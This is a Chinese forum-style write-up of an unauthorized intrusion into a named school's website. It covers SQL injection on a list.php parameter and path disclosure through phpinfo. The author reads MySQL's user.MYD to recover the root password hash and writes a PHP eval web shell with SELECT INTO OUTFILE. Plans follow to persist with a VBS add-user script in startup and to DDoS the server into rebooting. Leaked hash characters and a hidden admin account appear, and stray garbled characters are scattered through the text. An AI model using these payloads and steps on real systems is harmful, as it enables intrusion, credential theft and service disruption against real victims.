友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
1 S0 ]3 Z) |* O( O发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
# Z6 z4 k# ?5 Z, B1 h2 h& Y0 D
& A( t" B5 [& c3 t% Y- U
' d+ u' c9 k% o9 f
  T6 w3 f% G7 d/ F+ z: V; w0 j7 ~常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
7 x" q& ?, ~+ R' d% s
那么想可以直接写入shell ，getshell有几个条件：
# c6 B4 D3 F; T* j0 j

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
+ u4 k8 ]) K: s1 G1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
0 a: r2 u/ M( C/ S, R4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5 A/ m1 @, k9 J: j' f5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
" z: P' A# w: q5 |7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
& P9 C- r1 N/ M+ ]2 y6 v
均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

" x. x: d9 h9 l8 b6 `权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

6 W4 u/ G9 J+ l7 R. U. E+ q6 n默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
+ x0 B, x0 i$ n! x) s3 ]3 D
) _2 A9 M& O. O( h8 x# M敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
$ J8 p( M0 P1 I/ c$ ~9 B
7 \8 e( j; q& V想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

7 C7 a# W( ?! t) l/ ]2 R2 W6 e成功读到root密码：
# Y1 I; a5 n& Q* M& N
' y0 @/ L* D9 @$ n: |17---- r(0072)
  K/ [- F5 {' V/ _, @% B18---- o(006f)
; Z" z1 M3 `% q" ~19---- o(006f)
20---- t(0074)
21---- *(002a)
0 |4 _$ L+ e  D5 }! }& m$ s22---- 8(0038)
5 A; t& n- l/ }% f+ e& ~23---- 2(0032)
! [: F" G7 V8 q+ @3 C" }8 g- f5 m24---- E(0045)
25---- 1(0031)
% v5 _2 {# B5 n" Q. k. p( K3 l26---- C(0043)
27---- 5(0035)
+ I" q$ O; I( h0 F# t+ b28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
31---- A(0041)
. s5 E; b. Q4 W5 N/ @* }32---- 9(0039)
7 x. j, s  O8 s$ Y) I33---- B(0042)
34---- 5(0035)
; l/ G' l6 T" O2 a% a6 Q35---- 4(0034)
, h  s% n6 U% G7 F  @7 J36---- 8(0038)
* l. Q  ^9 s* e8 f37---- 6(0036)
38---- 4(0034)
5 U9 y, r6 V) E: ~6 S" f39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
  t6 h/ B* X) q, S. W6 M42---- 5(0035)
4 j+ G6 G4 [- P7 R) G- h- a- G/ z43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
1 B$ P/ ?# N; M9 p4 N46---- 8(0038)
47---- F(0046)
* \1 p, @" s: K1 Q; R48---- F(0046)
49---- 4(0034)
: q, }! i! W. X50---- F(0046)
51---- 0(0030)
% n4 c8 b: ]- _" A2 D7 }52---- 3(0033)
: P+ I! O# B0 A53---- 2(0032)
" w8 A; O% N9 H; o54---- A(0041)
55---- 4(0034)
56---- A(0041)
. @* }$ {% J+ A! N57---- B(0042)
. I7 \/ i& v  j0 B9 L58---- *(0044)
59---- *(0035)
60---- *(0041)
; M! i4 }; q! Z! [61---- *0032)

解密后成功登陆phpmyamin
                          
% x/ D- H! W4 @3 y, f# o
' k, L" v7 F" d& g                             
6 v) d/ t) j8 n9 F- }% s6 |6 |
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
3 o7 @5 @& z$ A+ Q# ]) r
6 }" I$ v5 l. K  k. ^成功执行，拿下shell，菜刀连接：

; T" F* H0 ?. l服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
2 k9 {" Z9 M6 T+ o. h& O6 n

服务器上已经有个隐藏帐号了

, K7 S1 r$ @% k; a% x3 a

别名     administrators
# ^5 u; ?9 H# ^* q$ q( h! W注释     管理员对计算机/域有不受限制的完全访问权

" [, {$ |% d& b3 t' `( w9 l

成员

-------------------------------------------------------------------------------
admin
Administrator
- \" b2 ~5 q; U# ?- l- zslipper$
sqluser
命令成功完成。
7 q9 m% g$ p" L: Z. G6 O
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

6 Y' U5 E  _6 p7 ?" Sddos服务器重启，不然就只能坐等服务器重启了...............................
! z) Z5 B6 R0 K2 k2 v6 u
      

3 F: l! q' m' ?

angel